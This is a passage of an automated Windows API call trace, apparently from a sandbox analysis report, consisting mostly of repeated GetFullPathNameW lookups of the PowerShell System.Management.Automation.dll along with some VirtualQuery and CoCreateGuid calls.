lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.796] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.796] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.798] VirtualQuery (in: lpAddress=0xcb8d0, lpBuffer=0xcc790, dwLength=0x30 | out: lpBuffer=0xcc790*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcba90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcba90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcba90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcba90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcba90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcba90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcba90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcba90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.800] VirtualQuery (in: lpAddress=0xcb8d0, lpBuffer=0xcc790, dwLength=0x30 | out: lpBuffer=0xcc790*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcba90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcba90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcba90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcba90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.802] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.802] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcba90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.802] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcba90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.802] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.802] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcba90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.802] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcba90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.802] VirtualQuery (in: lpAddress=0xcb8d0, lpBuffer=0xcc790, dwLength=0x30 | out: lpBuffer=0xcc790*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.802] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.802] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.803] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.803] VirtualQuery (in: lpAddress=0xcb8d0, lpBuffer=0xcc790, dwLength=0x30 | out: lpBuffer=0xcc790*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.803] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.803] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.803] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.803] VirtualQuery (in: lpAddress=0xcafc0, lpBuffer=0xcbe80, dwLength=0x30 | out: lpBuffer=0xcbe80*(BaseAddress=0xca000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.804] VirtualQuery (in: lpAddress=0xcb050, lpBuffer=0xcbf10, dwLength=0x30 | out: lpBuffer=0xcbf10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.804] VirtualQuery (in: lpAddress=0xcb730, lpBuffer=0xcc5f0, dwLength=0x30 | out: lpBuffer=0xcc5f0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.805] VirtualQuery (in: lpAddress=0xcb7c0, lpBuffer=0xcc680, dwLength=0x30 | out: lpBuffer=0xcc680*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.806] VirtualQuery (in: lpAddress=0xcb730, lpBuffer=0xcc5f0, dwLength=0x30 | out: lpBuffer=0xcc5f0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.806] VirtualQuery (in: lpAddress=0xcb7c0, lpBuffer=0xcc680, dwLength=0x30 | out: lpBuffer=0xcc680*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.806] VirtualQuery (in: lpAddress=0xcb7c0, lpBuffer=0xcc680, dwLength=0x30 | out: lpBuffer=0xcc680*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.806] VirtualQuery (in: lpAddress=0xcb730, lpBuffer=0xcc5f0, dwLength=0x30 | out: lpBuffer=0xcc5f0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.807] VirtualQuery (in: lpAddress=0xcb7c0, lpBuffer=0xcc680, dwLength=0x30 | out: lpBuffer=0xcc680*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.807] VirtualQuery (in: lpAddress=0xcb730, lpBuffer=0xcc5f0, dwLength=0x30 | out: lpBuffer=0xcc5f0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.807] VirtualQuery (in: lpAddress=0xcb7c0, lpBuffer=0xcc680, dwLength=0x30 | out: lpBuffer=0xcc680*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.807] VirtualQuery (in: lpAddress=0xcb730, lpBuffer=0xcc5f0, dwLength=0x30 | out: lpBuffer=0xcc5f0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.808] VirtualQuery (in: lpAddress=0xcb7c0, lpBuffer=0xcc680, dwLength=0x30 | out: lpBuffer=0xcc680*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.808] VirtualQuery (in: lpAddress=0xcb400, lpBuffer=0xcc2c0, dwLength=0x30 | out: lpBuffer=0xcc2c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.808] VirtualQuery (in: lpAddress=0xcb730, lpBuffer=0xcc5f0, dwLength=0x30 | out: lpBuffer=0xcc5f0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.809] VirtualQuery (in: lpAddress=0xcb7c0, lpBuffer=0xcc680, dwLength=0x30 | out: lpBuffer=0xcc680*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.809] VirtualQuery (in: lpAddress=0xcb730, lpBuffer=0xcc5f0, dwLength=0x30 | out: lpBuffer=0xcc5f0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.809] VirtualQuery (in: lpAddress=0xcb7c0, lpBuffer=0xcc680, dwLength=0x30 | out: lpBuffer=0xcc680*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.810] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x59e34e07, Data2=0x984d, Data3=0x43fd, Data4=([0]=0xa4, [1]=0x34, [2]=0xed, [3]=0x4a, [4]=0x86, [5]=0xa6, [6]=0xd2, [7]=0xcd))) returned 0x0 [0078.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.810] GetFullPathNameW (in: 